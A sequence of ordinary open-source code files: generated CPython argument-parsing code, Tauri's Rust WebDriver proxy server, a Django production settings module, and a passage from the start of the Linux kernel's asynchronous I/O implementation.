return return_value;
}
PyDoc_STRVAR(_interpqueues_get_maxsize__doc__,
"get_maxsize($module, /, qid)\n"
"--\n"
"\n"
"Return the maximum number of items in the queue.");
#define _INTERPQUEUES_GET_MAXSIZE_METHODDEF \
{"get_maxsize", _PyCFunction_CAST(_interpqueues_get_maxsize), METH_FASTCALL|METH_KEYWORDS, _interpqueues_get_maxsize__doc__},
static PyObject *
_interpqueues_get_maxsize_impl(PyObject *module, int64_t qid);
static PyObject *
_interpqueues_get_maxsize(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
PyObject *return_value = NULL;
#if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)
#define NUM_KEYWORDS 1
static struct {
PyGC_Head _this_is_not_used;
PyObject_VAR_HEAD
Py_hash_t ob_hash;
PyObject *ob_item[NUM_KEYWORDS];
} _kwtuple = {
.ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
.ob_hash = -1,
.ob_item = { &_Py_ID(qid), },
};
#undef NUM_KEYWORDS
#define KWTUPLE (&_kwtuple.ob_base.ob_base)
#else // !Py_BUILD_CORE
# define KWTUPLE NULL
#endif // !Py_BUILD_CORE
static const char * const _keywords[] = {"qid", NULL};
static _PyArg_Parser _parser = {
.keywords = _keywords,
.fname = "get_maxsize",
.kwtuple = KWTUPLE,
};
#undef KWTUPLE
PyObject *argsbuf[1];
int64_t qid;
args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
/*minpos*/ 1, /*maxpos*/ 1, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
if (!args) {
goto exit;
}
if (!qidarg_converter(args[0], &qid)) {
goto exit;
}
return_value = _interpqueues_get_maxsize_impl(module, qid);
exit:
return return_value;
}
PyDoc_STRVAR(_interpqueues_get_queue_defaults__doc__,
"get_queue_defaults($module, /, qid)\n"
"--\n"
"\n"
"Return the queue\'s default values, set when it was created.");
#define _INTERPQUEUES_GET_QUEUE_DEFAULTS_METHODDEF \
{"get_queue_defaults", _PyCFunction_CAST(_interpqueues_get_queue_defaults), METH_FASTCALL|METH_KEYWORDS, _interpqueues_get_queue_defaults__doc__},
static PyObject *
_interpqueues_get_queue_defaults_impl(PyObject *module, int64_t qid);
static PyObject *
_interpqueues_get_queue_defaults(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
PyObject *return_value = NULL;
#if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)
#define NUM_KEYWORDS 1
static struct {
PyGC_Head _this_is_not_used;
PyObject_VAR_HEAD
Py_hash_t ob_hash;
PyObject *ob_item[NUM_KEYWORDS];
} _kwtuple = {
.ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
.ob_hash = -1,
.ob_item = { &_Py_ID(qid), },
};
#undef NUM_KEYWORDS
#define KWTUPLE (&_kwtuple.ob_base.ob_base)
#else // !Py_BUILD_CORE
# define KWTUPLE NULL
#endif // !Py_BUILD_CORE
static const char * const _keywords[] = {"qid", NULL};
static _PyArg_Parser _parser = {
.keywords = _keywords,
.fname = "get_queue_defaults",
.kwtuple = KWTUPLE,
};
#undef KWTUPLE
PyObject *argsbuf[1];
int64_t qid;
args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
/*minpos*/ 1, /*maxpos*/ 1, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
if (!args) {
goto exit;
}
if (!qidarg_converter(args[0], &qid)) {
goto exit;
}
return_value = _interpqueues_get_queue_defaults_impl(module, qid);
exit:
return return_value;
}
PyDoc_STRVAR(_interpqueues_is_full__doc__,
"is_full($module, /, qid)\n"
"--\n"
"\n"
"Return true if the queue has a maxsize and has reached it.");
#define _INTERPQUEUES_IS_FULL_METHODDEF \
{"is_full", _PyCFunction_CAST(_interpqueues_is_full), METH_FASTCALL|METH_KEYWORDS, _interpqueues_is_full__doc__},
static PyObject *
_interpqueues_is_full_impl(PyObject *module, int64_t qid);
static PyObject *
_interpqueues_is_full(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
PyObject *return_value = NULL;
#if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)
#define NUM_KEYWORDS 1
static struct {
PyGC_Head _this_is_not_used;
PyObject_VAR_HEAD
Py_hash_t ob_hash;
PyObject *ob_item[NUM_KEYWORDS];
} _kwtuple = {
.ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
.ob_hash = -1,
.ob_item = { &_Py_ID(qid), },
};
#undef NUM_KEYWORDS
#define KWTUPLE (&_kwtuple.ob_base.ob_base)
#else // !Py_BUILD_CORE
# define KWTUPLE NULL
#endif // !Py_BUILD_CORE
static const char * const _keywords[] = {"qid", NULL};
static _PyArg_Parser _parser = {
.keywords = _keywords,
.fname = "is_full",
.kwtuple = KWTUPLE,
};
#undef KWTUPLE
PyObject *argsbuf[1];
int64_t qid;
args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
/*minpos*/ 1, /*maxpos*/ 1, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
if (!args) {
goto exit;
}
if (!qidarg_converter(args[0], &qid)) {
goto exit;
}
return_value = _interpqueues_is_full_impl(module, qid);
exit:
return return_value;
}
PyDoc_STRVAR(_interpqueues_get_count__doc__,
"get_count($module, /, qid)\n"
"--\n"
"\n"
"Return the number of items in the queue.");
#define _INTERPQUEUES_GET_COUNT_METHODDEF \
{"get_count", _PyCFunction_CAST(_interpqueues_get_count), METH_FASTCALL|METH_KEYWORDS, _interpqueues_get_count__doc__},
static PyObject *
_interpqueues_get_count_impl(PyObject *module, int64_t qid);
static PyObject *
_interpqueues_get_count(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
PyObject *return_value = NULL;
#if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)
#define NUM_KEYWORDS 1
static struct {
PyGC_Head _this_is_not_used;
PyObject_VAR_HEAD
Py_hash_t ob_hash;
PyObject *ob_item[NUM_KEYWORDS];
} _kwtuple = {
.ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
.ob_hash = -1,
.ob_item = { &_Py_ID(qid), },
};
#undef NUM_KEYWORDS
#define KWTUPLE (&_kwtuple.ob_base.ob_base)
#else // !Py_BUILD_CORE
# define KWTUPLE NULL
#endif // !Py_BUILD_CORE
static const char * const _keywords[] = {"qid", NULL};
static _PyArg_Parser _parser = {
.keywords = _keywords,
.fname = "get_count",
.kwtuple = KWTUPLE,
};
#undef KWTUPLE
PyObject *argsbuf[1];
int64_t qid;
args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
/*minpos*/ 1, /*maxpos*/ 1, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
if (!args) {
goto exit;
}
if (!qidarg_converter(args[0], &qid)) {
goto exit;
}
return_value = _interpqueues_get_count_impl(module, qid);
exit:
return return_value;
}
PyDoc_STRVAR(_interpqueues__register_heap_types__doc__,
"_register_heap_types($module, /, queuetype, emptyerror, fullerror)\n"
"--\n"
"\n"
"Return the number of items in the queue.");
#define _INTERPQUEUES__REGISTER_HEAP_TYPES_METHODDEF \
{"_register_heap_types", _PyCFunction_CAST(_interpqueues__register_heap_types), METH_FASTCALL|METH_KEYWORDS, _interpqueues__register_heap_types__doc__},
static PyObject *
_interpqueues__register_heap_types_impl(PyObject *module,
PyTypeObject *queuetype,
PyObject *emptyerror,
PyObject *fullerror);
static PyObject *
_interpqueues__register_heap_types(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
PyObject *return_value = NULL;
#if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)
#define NUM_KEYWORDS 3
static struct {
PyGC_Head _this_is_not_used;
PyObject_VAR_HEAD
Py_hash_t ob_hash;
PyObject *ob_item[NUM_KEYWORDS];
} _kwtuple = {
.ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
.ob_hash = -1,
.ob_item = { &_Py_ID(queuetype), &_Py_ID(emptyerror), &_Py_ID(fullerror), },
};
#undef NUM_KEYWORDS
#define KWTUPLE (&_kwtuple.ob_base.ob_base)
#else // !Py_BUILD_CORE
# define KWTUPLE NULL
#endif // !Py_BUILD_CORE
static const char * const _keywords[] = {"queuetype", "emptyerror", "fullerror", NULL};
static _PyArg_Parser _parser = {
.keywords = _keywords,
.fname = "_register_heap_types",
.kwtuple = KWTUPLE,
};
#undef KWTUPLE
PyObject *argsbuf[3];
PyTypeObject *queuetype;
PyObject *emptyerror;
PyObject *fullerror;
args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
/*minpos*/ 3, /*maxpos*/ 3, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
if (!args) {
goto exit;
}
if (!PyObject_TypeCheck(args[0], &PyType_Type)) {
_PyArg_BadArgument("_register_heap_types", "argument 'queuetype'", (&PyType_Type)->tp_name, args[0]);
goto exit;
}
queuetype = (PyTypeObject *)args[0];
emptyerror = args[1];
fullerror = args[2];
return_value = _interpqueues__register_heap_types_impl(module, queuetype, emptyerror, fullerror);
exit:
return return_value;
}
/*[clinic end generated code: output=64cea8e1063429b6 input=a9049054013a1b77]*/ | c | github | https://github.com/python/cpython | Modules/clinic/_interpqueuesmodule.c.h |
// Copyright 2019-2024 Tauri Programme within The Commons Conservancy
// SPDX-License-Identifier: Apache-2.0
// SPDX-License-Identifier: MIT
use crate::cli::Args;
use anyhow::Error;
use futures_util::TryFutureExt;
use http_body_util::{BodyExt, Full};
use hyper::{
body::{Bytes, Incoming},
header::CONTENT_LENGTH,
http::uri::Authority,
service::service_fn,
Method, Request, Response,
};
use hyper_util::{
client::legacy::{connect::HttpConnector, Client},
rt::{TokioExecutor, TokioIo},
server::conn::auto,
};
use serde::Deserialize;
use serde_json::{json, Map, Value};
use std::path::PathBuf;
use std::process::Child;
use tokio::net::TcpListener;
const TAURI_OPTIONS: &str = "tauri:options";
#[derive(Debug, Deserialize)]
#[serde(rename_all = "camelCase")]
struct TauriOptions {
application: PathBuf,
#[serde(default)]
args: Vec<String>,
#[cfg(target_os = "windows")]
#[serde(default)]
webview_options: Option<Value>,
}
impl TauriOptions {
#[cfg(target_os = "linux")]
fn into_native_object(self) -> Map<String, Value> {
let mut map = Map::new();
map.insert(
"webkitgtk:browserOptions".into(),
json!({"binary": self.application, "args": self.args}),
);
map
}
#[cfg(target_os = "windows")]
fn into_native_object(self) -> Map<String, Value> {
let mut ms_edge_options = Map::new();
ms_edge_options.insert(
"binary".into(),
json!(self.application.with_extension("exe")),
);
ms_edge_options.insert("args".into(), self.args.into());
if let Some(webview_options) = self.webview_options {
ms_edge_options.insert("webviewOptions".into(), webview_options);
}
let mut map = Map::new();
map.insert("ms:edgeChromium".into(), json!(true));
map.insert("browserName".into(), json!("webview2"));
map.insert("ms:edgeOptions".into(), ms_edge_options.into());
map
}
}
async fn handle(
client: Client<HttpConnector, Full<Bytes>>,
req: Request<Incoming>,
args: Args,
) -> Result<Response<Incoming>, Error> {
// manipulate a new session to convert options to the native driver format
let new_req: Request<Full<Bytes>> =
if let (&Method::POST, "/session") = (req.method(), req.uri().path()) {
let (mut parts, body) = req.into_parts();
// get the body from the future stream and parse it as json
let body = body.collect().await?.to_bytes().to_vec();
let json: Value = serde_json::from_slice(&body)?;
// manipulate the json to convert from tauri option to native driver options
let json = map_capabilities(json);
// serialize json and update the content-length header to be accurate
let bytes = serde_json::to_vec(&json)?;
parts.headers.insert(CONTENT_LENGTH, bytes.len().into());
Request::from_parts(parts, Full::new(bytes.into()))
} else {
let (parts, body) = req.into_parts();
let body = body.collect().await?.to_bytes().to_vec();
Request::from_parts(parts, Full::new(body.into()))
};
client
.request(forward_to_native_driver(new_req, args)?)
.err_into()
.await
}
/// Transform the request to a request for the native webdriver server.
fn forward_to_native_driver(
mut req: Request<Full<Bytes>>,
args: Args,
) -> Result<Request<Full<Bytes>>, Error> {
let host: Authority = {
let headers = req.headers_mut();
headers.remove("host").expect("hyper request has host")
}
.to_str()?
.parse()?;
let path = req
.uri()
.path_and_query()
.expect("hyper request has uri")
.clone();
let uri = format!(
"http://{}:{}{}",
host.host(),
args.native_port,
path.as_str()
);
let (mut parts, body) = req.into_parts();
parts.uri = uri.parse()?;
Ok(Request::from_parts(parts, body))
}
/// only happy path for now, no errors
fn map_capabilities(mut json: Value) -> Value {
let mut native = None;
if let Some(capabilities) = json.get_mut("capabilities") {
if let Some(always_match) = capabilities.get_mut("alwaysMatch") {
if let Some(always_match) = always_match.as_object_mut() {
if let Some(tauri_options) = always_match.remove(TAURI_OPTIONS) {
if let Ok(options) = serde_json::from_value::<TauriOptions>(tauri_options) {
native = Some(options.into_native_object());
}
}
if let Some(native) = native.clone() {
always_match.extend(native);
}
}
}
}
if let Some(native) = native {
if let Some(desired) = json.get_mut("desiredCapabilities") {
if let Some(desired) = desired.as_object_mut() {
desired.remove(TAURI_OPTIONS);
desired.extend(native);
}
}
}
json
}
#[tokio::main(flavor = "current_thread")]
pub async fn run(args: Args, mut _driver: Child) -> Result<(), Error> {
#[cfg(unix)]
let (signals_handle, signals_task) = {
use futures_util::StreamExt;
use signal_hook::consts::signal::*;
let signals = signal_hook_tokio::Signals::new([SIGTERM, SIGINT, SIGQUIT])?;
let signals_handle = signals.handle();
let signals_task = tokio::spawn(async move {
let mut signals = signals.fuse();
#[allow(clippy::never_loop)]
while let Some(signal) = signals.next().await {
match signal {
SIGTERM | SIGINT | SIGQUIT => {
_driver
.kill()
.expect("unable to kill native webdriver server");
std::process::exit(0);
}
_ => unreachable!(),
}
}
});
(signals_handle, signals_task)
};
let address = std::net::SocketAddr::from(([127, 0, 0, 1], args.port));
// the client we use to proxy requests to the native webdriver
let client = Client::builder(TokioExecutor::new())
.http1_preserve_header_case(true)
.http1_title_case_headers(true)
.retry_canceled_requests(false)
.build_http();
// set up a http1 server that uses the service we just created
let srv = async move {
if let Ok(listener) = TcpListener::bind(address).await {
loop {
let client = client.clone();
let args = args.clone();
if let Ok((stream, _)) = listener.accept().await {
let io = TokioIo::new(stream);
tokio::task::spawn(async move {
if let Err(err) = auto::Builder::new(TokioExecutor::new())
.http1()
.title_case_headers(true)
.preserve_header_case(true)
.serve_connection(
io,
service_fn(|request| handle(client.clone(), request, args.clone())),
)
.await
{
println!("Error serving connection: {err:?}");
}
});
} else {
println!("accept new stream fail, ignore here");
}
}
} else {
println!("can not listen to address: {address:?}");
}
};
srv.await;
#[cfg(unix)]
{
signals_handle.close();
signals_task.await?;
}
Ok(())
} | rust | github | https://github.com/tauri-apps/tauri | crates/tauri-driver/src/server.rs |
import os
import socket
from django.utils.translation import ugettext_lazy as _
from .base import * # noqa
SERVER_ENV = os.getenv('DJANGO_SERVER_ENV')
SECRET_KEY = os.getenv('SECRET_KEY')
DEBUG = TEMPLATE_DEBUG = False
ALLOWED_HOSTS = [
# the server's IP (for monitors)
socket.gethostbyname(socket.gethostname()),
]
if SERVER_ENV == 'prod':
ALLOWED_HOSTS.extend([
'webwewant.mozilla.org',
'glow.cdn.mozilla.net',
'glow-origin.cdn.mozilla.net',
])
STATIC_URL = 'https://glow.cdn.mozilla.net/static/'
LANGUAGES = (
('cs', _('Czech')),
('de', _('German')),
('en', _('English')),
('es', _('Spanish')),
('fr', _('French')),
('he', _('Hebrew')),
('hu', _('Hungarian')),
('id', _('Indonesian')),
('it', _('Italian')),
('ja', _('Japanese')),
('ko', _('Korean')),
('lt', _('Lithuanian')),
('nl', _('Dutch')),
('pl', _('Polish')),
('pt-br', _('Brazilian Portuguese')),
('ro', _('Romanian')),
('ru', _('Russian')),
('sk', _('Slovak')),
('sl', _('Slovenian')),
('sq', _('Albanian')),
('sr', _('Serbian')),
('zh-cn', _('Simplified Chinese')),
('zh-tw', _('Traditional Chinese')),
('xx', 'Pirate'),
)
elif SERVER_ENV == 'dev':
ALLOWED_HOSTS.append('webwewant.allizom.org')
CACHES = {
# DB 1 is for the site cache
'default': {
'BACKEND': 'redis_cache.cache.RedisCache',
'LOCATION': 'unix:/var/run/redis/redis.sock:1',
'OPTIONS': {
'PARSER_CLASS': 'redis.connection.HiredisParser',
}
},
# DB 0 is for the glow data
'smithers': {
'BACKEND': 'redis_cache.cache.RedisCache',
'LOCATION': 'unix:/var/run/redis/redis.sock:0',
'OPTIONS': {
'PARSER_CLASS': 'redis.connection.HiredisParser',
}
}
}
DJANGO_REDIS_IGNORE_EXCEPTIONS = False
ENABLE_REDIS = True
# Sentry
INSTALLED_APPS += ('raven.contrib.django.raven_compat',)
RAVEN_CONFIG = {
'dsn': os.getenv('SENTRY_DSN'),
} | unknown | codeparrot/codeparrot-clean | ||
/*
* An async IO implementation for Linux
* Written by Benjamin LaHaise <bcrl@kvack.org>
*
* Implements an efficient asynchronous io interface.
*
* Copyright 2000, 2001, 2002 Red Hat, Inc. All Rights Reserved.
* Copyright 2018 Christoph Hellwig.
*
* See ../COPYING for licensing terms.
*/
#define pr_fmt(fmt) "%s: " fmt, __func__
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/errno.h>
#include <linux/time.h>
#include <linux/aio_abi.h>
#include <linux/export.h>
#include <linux/syscalls.h>
#include <linux/backing-dev.h>
#include <linux/refcount.h>
#include <linux/uio.h>
#include <linux/sched/signal.h>
#include <linux/fs.h>
#include <linux/file.h>
#include <linux/mm.h>
#include <linux/mman.h>
#include <linux/percpu.h>
#include <linux/slab.h>
#include <linux/timer.h>
#include <linux/aio.h>
#include <linux/highmem.h>
#include <linux/workqueue.h>
#include <linux/security.h>
#include <linux/eventfd.h>
#include <linux/blkdev.h>
#include <linux/compat.h>
#include <linux/migrate.h>
#include <linux/ramfs.h>
#include <linux/percpu-refcount.h>
#include <linux/mount.h>
#include <linux/pseudo_fs.h>
#include <linux/uaccess.h>
#include <linux/nospec.h>
#include "internal.h"
#define KIOCB_KEY 0
#define AIO_RING_MAGIC 0xa10a10a1
#define AIO_RING_COMPAT_FEATURES 1
#define AIO_RING_INCOMPAT_FEATURES 0
struct aio_ring {
unsigned id; /* kernel internal index number */
unsigned nr; /* number of io_events */
unsigned head; /* Written to by userland or under ring_lock
* mutex by aio_read_events_ring(). */
unsigned tail;
unsigned magic;
unsigned compat_features;
unsigned incompat_features;
unsigned header_length; /* size of aio_ring */
struct io_event io_events[];
}; /* 128 bytes + ring size */
/*
* Plugging is meant to work with larger batches of IOs. If we don't
* have more than the below, then don't bother setting up a plug.
*/
#define AIO_PLUG_THRESHOLD 2
#define AIO_RING_PAGES 8
struct kioctx_table {
struct rcu_head rcu;
unsigned nr;
struct kioctx __rcu *table[] __counted_by(nr);
};
struct kioctx_cpu {
unsigned reqs_available;
};
struct ctx_rq_wait {
struct completion comp;
atomic_t count;
};
struct kioctx {
struct percpu_ref users;
atomic_t dead;
struct percpu_ref reqs;
unsigned long user_id;
struct kioctx_cpu __percpu *cpu;
/*
* For percpu reqs_available, number of slots we move to/from global
* counter at a time:
*/
unsigned req_batch;
/*
* This is what userspace passed to io_setup(), it's not used for
* anything but counting against the global max_reqs quota.
*
* The real limit is nr_events - 1, which will be larger (see
* aio_setup_ring())
*/
unsigned max_reqs;
/* Size of ringbuffer, in units of struct io_event */
unsigned nr_events;
unsigned long mmap_base;
unsigned long mmap_size;
struct folio **ring_folios;
long nr_pages;
struct rcu_work free_rwork; /* see free_ioctx() */
/*
* signals when all in-flight requests are done
*/
struct ctx_rq_wait *rq_wait;
struct {
/*
* This counts the number of available slots in the ringbuffer,
* so we avoid overflowing it: it's decremented (if positive)
* when allocating a kiocb and incremented when the resulting
* io_event is pulled off the ringbuffer.
*
* We batch accesses to it with a percpu version.
*/
atomic_t reqs_available;
} ____cacheline_aligned_in_smp;
struct {
spinlock_t ctx_lock;
struct list_head active_reqs; /* used for cancellation */
} ____cacheline_aligned_in_smp;
struct {
struct mutex ring_lock;
wait_queue_head_t wait;
} ____cacheline_aligned_in_smp;
struct {
unsigned tail;
unsigned completed_events;
spinlock_t completion_lock;
} ____cacheline_aligned_in_smp;
struct folio *internal_folios[AIO_RING_PAGES];
struct file *aio_ring_file;
unsigned id;
};
/*
* First field must be the file pointer in all the
* iocb unions! See also 'struct kiocb' in <linux/fs.h>
*/
struct fsync_iocb {
struct file *file;
struct work_struct work;
bool datasync;
struct cred *creds;
};
struct poll_iocb {
struct file *file;
struct wait_queue_head *head;
__poll_t events;
bool cancelled;
bool work_scheduled;
bool work_need_resched;
struct wait_queue_entry wait;
struct work_struct work;
};
/*
* NOTE! Each of the iocb union members has the file pointer
* as the first entry in their struct definition. So you can
* access the file pointer through any of the sub-structs,
* or directly as just 'ki_filp' in this struct.
*/
struct aio_kiocb {
union {
struct file *ki_filp;
struct kiocb rw;
struct fsync_iocb fsync;
struct poll_iocb poll;
};
struct kioctx *ki_ctx;
kiocb_cancel_fn *ki_cancel;
struct io_event ki_res;
struct list_head ki_list; /* the aio core uses this
* for cancellation */
refcount_t ki_refcnt;
/*
* If the aio_resfd field of the userspace iocb is not zero,
* this is the underlying eventfd context to deliver events to.
*/
struct eventfd_ctx *ki_eventfd;
};
/*------ sysctl variables----*/
static DEFINE_SPINLOCK(aio_nr_lock);
static unsigned long aio_nr; /* current system wide number of aio requests */
static unsigned long aio_max_nr = 0x10000; /* system wide maximum number of aio requests */
/*----end sysctl variables---*/
#ifdef CONFIG_SYSCTL
static const struct ctl_table aio_sysctls[] = {
{
.procname = "aio-nr",
.data = &aio_nr,
.maxlen = sizeof(aio_nr),
.mode = 0444,
.proc_handler = proc_doulongvec_minmax,
},
{
.procname = "aio-max-nr",
.data = &aio_max_nr,
.maxlen = sizeof(aio_max_nr),
.mode = 0644,
.proc_handler = proc_doulongvec_minmax,
},
};
static void __init aio_sysctl_init(void)
{
register_sysctl_init("fs", aio_sysctls);
}
#else
#define aio_sysctl_init() do { } while (0)
#endif
static struct kmem_cache *kiocb_cachep;
static struct kmem_cache *kioctx_cachep;
static struct vfsmount *aio_mnt;
static const struct file_operations aio_ring_fops;
static const struct address_space_operations aio_ctx_aops;
static struct file *aio_private_file(struct kioctx *ctx, loff_t nr_pages)
{
struct file *file;
struct inode *inode = alloc_anon_inode(aio_mnt->mnt_sb);
if (IS_ERR(inode))
return ERR_CAST(inode);
inode->i_mapping->a_ops = &aio_ctx_aops;
inode->i_mapping->i_private_data = ctx;
inode->i_size = PAGE_SIZE * nr_pages;
file = alloc_file_pseudo(inode, aio_mnt, "[aio]",
O_RDWR, &aio_ring_fops);
if (IS_ERR(file))
iput(inode);
return file;
}
static int aio_init_fs_context(struct fs_context *fc)
{
if (!init_pseudo(fc, AIO_RING_MAGIC))
return -ENOMEM;
fc->s_iflags |= SB_I_NOEXEC;
return 0;
}
/* aio_setup
* Creates the slab caches used by the aio routines, panic on
* failure as this is done early during the boot sequence.
*/
static int __init aio_setup(void)
{
static struct file_system_type aio_fs = {
.name = "aio",
.init_fs_context = aio_init_fs_context,
.kill_sb = kill_anon_super,
};
aio_mnt = kern_mount(&aio_fs);
if (IS_ERR(aio_mnt))
panic("Failed to create aio fs mount.");
kiocb_cachep = KMEM_CACHE(aio_kiocb, SLAB_HWCACHE_ALIGN|SLAB_PANIC);
kioctx_cachep = KMEM_CACHE(kioctx,SLAB_HWCACHE_ALIGN|SLAB_PANIC);
aio_sysctl_init();
return 0;
}
__initcall(aio_setup);
static void put_aio_ring_file(struct kioctx *ctx)
{
struct file *aio_ring_file = ctx->aio_ring_file;
struct address_space *i_mapping;
if (aio_ring_file) {
truncate_setsize(file_inode(aio_ring_file), 0);
/* Prevent further access to the kioctx from migratepages */
i_mapping = aio_ring_file->f_mapping;
spin_lock(&i_mapping->i_private_lock);
i_mapping->i_private_data = NULL;
ctx->aio_ring_file = NULL;
spin_unlock(&i_mapping->i_private_lock);
fput(aio_ring_file);
}
}
static void aio_free_ring(struct kioctx *ctx)
{
int i;
/* Disconnect the kiotx from the ring file. This prevents future
* accesses to the kioctx from page migration.
*/
put_aio_ring_file(ctx);
for (i = 0; i < ctx->nr_pages; i++) {
struct folio *folio = ctx->ring_folios[i];
if (!folio)
continue;
pr_debug("pid(%d) [%d] folio->count=%d\n", current->pid, i,
folio_ref_count(folio));
ctx->ring_folios[i] = NULL;
folio_put(folio);
}
if (ctx->ring_folios && ctx->ring_folios != ctx->internal_folios) {
kfree(ctx->ring_folios);
ctx->ring_folios = NULL;
}
}
static int aio_ring_mremap(struct vm_area_struct *vma)
{
struct file *file = vma->vm_file;
struct mm_struct *mm = vma->vm_mm;
struct kioctx_table *table;
int i, res = -EINVAL;
spin_lock(&mm->ioctx_lock);
rcu_read_lock();
table = rcu_dereference(mm->ioctx_table);
if (!table)
goto out_unlock;
for (i = 0; i < table->nr; i++) {
struct kioctx *ctx;
ctx = rcu_dereference(table->table[i]);
if (ctx && ctx->aio_ring_file == file) {
if (!atomic_read(&ctx->dead)) {
ctx->user_id = ctx->mmap_base = vma->vm_start;
res = 0;
}
break;
}
}
out_unlock:
rcu_read_unlock();
spin_unlock(&mm->ioctx_lock);
return res;
}
static const struct vm_operations_struct aio_ring_vm_ops = {
.mremap = aio_ring_mremap,
#if IS_ENABLED(CONFIG_MMU)
.fault = filemap_fault,
.map_pages = filemap_map_pages,
.page_mkwrite = filemap_page_mkwrite,
#endif
};
static int aio_ring_mmap_prepare(struct vm_area_desc *desc)
{
desc->vm_flags |= VM_DONTEXPAND;
desc->vm_ops = &aio_ring_vm_ops;
return 0;
}
static const struct file_operations aio_ring_fops = {
.mmap_prepare = aio_ring_mmap_prepare,
};
#if IS_ENABLED(CONFIG_MIGRATION)
static int aio_migrate_folio(struct address_space *mapping, struct folio *dst,
struct folio *src, enum migrate_mode mode)
{
struct kioctx *ctx;
unsigned long flags;
pgoff_t idx;
int rc = 0;
/* mapping->i_private_lock here protects against the kioctx teardown. */
spin_lock(&mapping->i_private_lock);
ctx = mapping->i_private_data;
if (!ctx) {
rc = -EINVAL;
goto out;
}
/* The ring_lock mutex. The prevents aio_read_events() from writing
* to the ring's head, and prevents page migration from mucking in
* a partially initialized kiotx.
*/
if (!mutex_trylock(&ctx->ring_lock)) {
rc = -EAGAIN;
goto out;
}
idx = src->index;
if (idx < (pgoff_t)ctx->nr_pages) {
/* Make sure the old folio hasn't already been changed */
if (ctx->ring_folios[idx] != src)
rc = -EAGAIN;
} else
rc = -EINVAL;
if (rc != 0)
goto out_unlock;
/* Writeback must be complete */
BUG_ON(folio_test_writeback(src));
folio_get(dst);
rc = folio_migrate_mapping(mapping, dst, src, 1);
if (rc) {
folio_put(dst);
goto out_unlock;
}
/* Take completion_lock to prevent other writes to the ring buffer
* while the old folio is copied to the new. This prevents new
* events from being lost.
*/
spin_lock_irqsave(&ctx->completion_lock, flags);
folio_copy(dst, src);
folio_migrate_flags(dst, src);
BUG_ON(ctx->ring_folios[idx] != src);
ctx->ring_folios[idx] = dst;
spin_unlock_irqrestore(&ctx->completion_lock, flags);
/* The old folio is no longer accessible. */
folio_put(src);
out_unlock:
mutex_unlock(&ctx->ring_lock);
out:
spin_unlock(&mapping->i_private_lock);
return rc;
}
#else
#define aio_migrate_folio NULL
#endif
static const struct address_space_operations aio_ctx_aops = {
.dirty_folio = noop_dirty_folio,
.migrate_folio = aio_migrate_folio,
};
static int aio_setup_ring(struct kioctx *ctx, unsigned int nr_events)
{
struct aio_ring *ring;
struct mm_struct *mm = current->mm;
unsigned long size, unused;
int nr_pages;
int i;
struct file *file;
/* Compensate for the ring buffer's head/tail overlap entry */
nr_events += 2; /* 1 is required, 2 for good luck */
size = sizeof(struct aio_ring);
size += sizeof(struct io_event) * nr_events;
nr_pages = PFN_UP(size);
if (nr_pages < 0)
return -EINVAL;
file = aio_private_file(ctx, nr_pages);
if (IS_ERR(file)) {
ctx->aio_ring_file = NULL;
return -ENOMEM;
}
ctx->aio_ring_file = file;
nr_events = (PAGE_SIZE * nr_pages - sizeof(struct aio_ring))
/ sizeof(struct io_event);
ctx->ring_folios = ctx->internal_folios;
if (nr_pages > AIO_RING_PAGES) {
ctx->ring_folios = kcalloc(nr_pages, sizeof(struct folio *),
GFP_KERNEL);
if (!ctx->ring_folios) {
put_aio_ring_file(ctx);
return -ENOMEM;
}
}
for (i = 0; i < nr_pages; i++) {
struct folio *folio;
folio = __filemap_get_folio(file->f_mapping, i,
FGP_LOCK | FGP_ACCESSED | FGP_CREAT,
GFP_USER | __GFP_ZERO);
if (IS_ERR(folio))
break;
pr_debug("pid(%d) [%d] folio->count=%d\n", current->pid, i,
folio_ref_count(folio));
folio_end_read(folio, true);
ctx->ring_folios[i] = folio;
}
ctx->nr_pages = i;
if (unlikely(i != nr_pages)) {
aio_free_ring(ctx);
return -ENOMEM;
}
ctx->mmap_size = nr_pages * PAGE_SIZE;
pr_debug("attempting mmap of %lu bytes\n", ctx->mmap_size);
if (mmap_write_lock_killable(mm)) {
ctx->mmap_size = 0;
aio_free_ring(ctx);
return -EINTR;
}
ctx->mmap_base = do_mmap(ctx->aio_ring_file, 0, ctx->mmap_size,
PROT_READ | PROT_WRITE,
MAP_SHARED, 0, 0, &unused, NULL);
mmap_write_unlock(mm);
if (IS_ERR((void *)ctx->mmap_base)) {
ctx->mmap_size = 0;
aio_free_ring(ctx);
return -ENOMEM;
}
pr_debug("mmap address: 0x%08lx\n", ctx->mmap_base);
ctx->user_id = ctx->mmap_base;
ctx->nr_events = nr_events; /* trusted copy */
ring = folio_address(ctx->ring_folios[0]);
ring->nr = nr_events; /* user copy */
ring->id = ~0U;
ring->head = ring->tail = 0;
ring->magic = AIO_RING_MAGIC;
